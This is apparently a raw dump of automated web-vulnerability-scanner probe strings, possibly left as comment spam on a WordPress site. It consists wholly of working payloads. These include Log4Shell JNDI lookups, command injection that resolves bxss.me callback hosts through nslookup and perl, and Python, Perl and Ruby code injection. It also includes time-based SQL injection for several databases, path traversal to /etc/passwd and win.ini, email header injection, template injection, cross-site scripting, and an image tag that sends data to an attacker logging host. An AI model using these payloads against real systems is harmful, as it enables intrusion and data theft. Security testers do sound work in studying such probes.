💡'”><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hityzsxqeeruob0813${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.62-70033.62.fb0b1${::-.}1${::-.}bxss.me}}
echo obkqzj$()\ cnstlt\nz^xyu||a #’ &echo obkqzj$()\ cnstlt\nz^xyu||a #|” &echo obkqzj$()\ cnstlt\nz^xyu||a #
&echo mtamhc$()\ crwocd\nz^xyu||a #’ &echo mtamhc$()\ crwocd\nz^xyu||a #|” &echo mtamhc$()\ crwocd\nz^xyu||a #
|echo covipg$()\ dbawpl\nz^xyu||a #’ |echo covipg$()\ dbawpl\nz^xyu||a #|” |echo covipg$()\ dbawpl\nz^xyu||a #
&(nslookup hityfvpwnvrmu24aae.bxss.me||perl -e “gethostbyname(‘hityfvpwnvrmu24aae.bxss.me’)”)&’\”`0&(nslookup hityfvpwnvrmu24aae.bxss.me||perl -e “gethostbyname(‘hityfvpwnvrmu24aae.bxss.me’)”)&`’
;(nslookup hitvhbpwlobbpa6297.bxss.me||perl -e “gethostbyname(‘hitvhbpwlobbpa6297.bxss.me’)”)|(nslookup hitvhbpwlobbpa6297.bxss.me||perl -e “gethostbyname(‘hitvhbpwlobbpa6297.bxss.me’)”)&(nslookup hitvhbpwlobbpa6297.bxss.me||perl -e “gethostbyname(‘hitvhbpwlobbpa6297.bxss.me’)”)
‘.gethostbyname(lc(‘hitjc’.’lraubjcl83e75.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(118).chr(72).chr(121).chr(77).’
“.gethostbyname(lc(“hitlt”.”jmsugrsx6a0ca.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(115).chr(66).chr(107).chr(65).”
‘+str(__import__(“time”).sleep(9))+__import__(“socket”).gethostbyname(“hitbwlnulrwlh5c28d.”+”bxss.me”)+’
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
“+str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hitbwlnulrwlh5c28d.’+’bxss.me’)+”
“+”A”.concat(70-3).concat(22*4).concat(111).concat(70).concat(113).concat(85)+(require”socket” Socket.gethostbyname(“hitml”+”crvpwnof7912a.bxss.me.”)[3].to_s)+”
‘+’A’.concat(70-3).concat(22*4).concat(100).concat(87).concat(116).concat(81)+(require’socket’ Socket.gethostbyname(‘hitzc’+’cvkmatqea498d.bxss.me.’)[3].to_s)+’
555
555′>”>
${j${::-n}di:dns${::-:}${::-/}/hitpgeuisqpiie37d6${::-.}bxss.me}zzzz
response.write(9356980*9406129)
‘+response.write(9356980*9406129)+’
“+response.write(9356980*9406129)+”
💡'”><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hityzsxqeeruob0813${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
mOv3I2c3
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.62-70033.62.fb0b1${::-.}1${::-.}bxss.me}}
555
bcc:074625.62-70037.62.fb0b1.19218.2@bxss.me
../../../../../../../../../../../../../../etc/passwd
to@example.com>
bcc:074625.62-70039.62.fb0b1.19218.2@bxss.me
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
../555
echo obkqzj$()\ cnstlt\nz^xyu||a #’ &echo obkqzj$()\ cnstlt\nz^xyu||a #|” &echo obkqzj$()\ cnstlt\nz^xyu||a #
&echo mtamhc$()\ crwocd\nz^xyu||a #’ &echo mtamhc$()\ crwocd\nz^xyu||a #|” &echo mtamhc$()\ crwocd\nz^xyu||a #
./555
|echo covipg$()\ dbawpl\nz^xyu||a #’ |echo covipg$()\ dbawpl\nz^xyu||a #|” |echo covipg$()\ dbawpl\nz^xyu||a #
(nslookup hitbjloxuswnb06c1a.bxss.me||perl -e “gethostbyname(‘hitbjloxuswnb06c1a.bxss.me’)”)
12345′”\’\”);|]*{
”💡
kZDVtOdq
${9999717+9999910}
$(nslookup hitjnleotoxpy9a962.bxss.me||perl -e “gethostbyname(‘hitjnleotoxpy9a962.bxss.me’)”)
1*555
555*796*791*0
&(nslookup hityfvpwnvrmu24aae.bxss.me||perl -e “gethostbyname(‘hityfvpwnvrmu24aae.bxss.me’)”)&’\”`0&(nslookup hityfvpwnvrmu24aae.bxss.me||perl -e “gethostbyname(‘hityfvpwnvrmu24aae.bxss.me’)”)&`’
555&n918236=v962350
(1356-796-5)
|(nslookup hitcgtdddryyj755da.bxss.me||perl -e “gethostbyname(‘hitcgtdddryyj755da.bxss.me’)”)
)
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
!(()&&!|*|*|
555*176*171*0
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
^(#$!@#$)(()))******
`(nslookup hitatkaumsmvef1e22.bxss.me||perl -e “gethostbyname(‘hitatkaumsmvef1e22.bxss.me’)”)`
(736-176-5)
http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
;(nslookup hitvhbpwlobbpa6297.bxss.me||perl -e “gethostbyname(‘hitvhbpwlobbpa6297.bxss.me’)”)|(nslookup hitvhbpwlobbpa6297.bxss.me||perl -e “gethostbyname(‘hitvhbpwlobbpa6297.bxss.me’)”)&(nslookup hitvhbpwlobbpa6297.bxss.me||perl -e “gethostbyname(‘hitvhbpwlobbpa6297.bxss.me’)”)
555*339*334*0
/etc/shells
(899-339-5)
c:/windows/win.ini
‘.gethostbyname(lc(‘hitjc’.’lraubjcl83e75.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(118).chr(72).chr(121).chr(77).’
-1 OR 2+946-946-1=0+0+0+1
bxss.me
‘”()
-1 OR 3+946-946-1=0+0+0+1
“.gethostbyname(lc(“hitlt”.”jmsugrsx6a0ca.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(115).chr(66).chr(107).chr(65).”
if(now()=sysdate(),sleep(15),0)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hitbwlnulrwlh5c28d.’+’bxss.me’)
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
555’&&sleep(27*1000)*fbqhyl&&’
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
‘+str(__import__(“time”).sleep(9))+__import__(“socket”).gethostbyname(“hitbwlnulrwlh5c28d.”+”bxss.me”)+’
‘;print(md5(31337));$a=’
555″&&sleep(27*1000)*hpmwca&&”
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
“+str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hitbwlnulrwlh5c28d.’+’bxss.me’)+”
555’||sleep(27*1000)*ninnui||’
-1; waitfor delay ‘0:0:15’ —
“;print(md5(31337));$a=”
http://bxss.me/t/xss.html?%00
555″||sleep(27*1000)*bpbtyc||”
bxss.me/t/xss.html?%00
-1); waitfor delay ‘0:0:15’ —
${@print(md5(31337))}
${@print(md5(31337))}\
1 waitfor delay ‘0:0:15’ —
‘.print(md5(31337)).’
T6VxsR4t’; waitfor delay ‘0:0:15’ —
-5 OR 628=(SELECT 628 FROM PG_SLEEP(15))–
-5) OR 495=(SELECT 495 FROM PG_SLEEP(15))–
-1)) OR 789=(SELECT 789 FROM PG_SLEEP(15))–
WoILCObv’ OR 725=(SELECT 725 FROM PG_SLEEP(15))–
“+”A”.concat(70-3).concat(22*4).concat(111).concat(70).concat(113).concat(85)+(require”socket”
Socket.gethostbyname(“hitml”+”crvpwnof7912a.bxss.me.”)[3].to_s)+”
http://hitndsizqnfab.bxss.me/
wp-comments-post.php
eZnq0tFw’) OR 846=(SELECT 846 FROM PG_SLEEP(15))–
xQvCnjAu’)) OR 223=(SELECT 223 FROM PG_SLEEP(15))–
‘+’A’.concat(70-3).concat(22*4).concat(100).concat(87).concat(116).concat(81)+(require’socket’
Socket.gethostbyname(‘hitzc’+’cvkmatqea498d.bxss.me.’)[3].to_s)+’
wp-comments-post.php/.
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1′”
1%2527%2522
@@co8jf
/xfs.bxss.me
‘”
<!–
555′”()&%wWza(9823)
‘”()&%wWza(9118)
5559585290
bfg6182<s1﹥s2ʺs3ʹhjl6182
bfgx4213z1z2abcxhjl4213
<th:t="${dfb}#foreach
1}}”}}’}}1%>”%>’%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
“dfbzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
555wWza(9172)
5554TXGB[!+!]
555wWza(9529)
555<ScRIpT>wWza(9899)</sCrIpT>
555wWza(9694)
555wWza(9819)
555″ onerror=alert(9956)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%77%57%7A%61%289403%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\wWza(9222)\u003C/sCripT\u003E
555<ScRiPt>wWza(9940)</sCripT>
555}body{zzz:Expre/**/SSion(wWza(9711))}
555kKBDo
wWza(9240)
555FRCBN[!+!]
555<img sRc='http://attacker-9339/log.php?
555<a7w0QoY<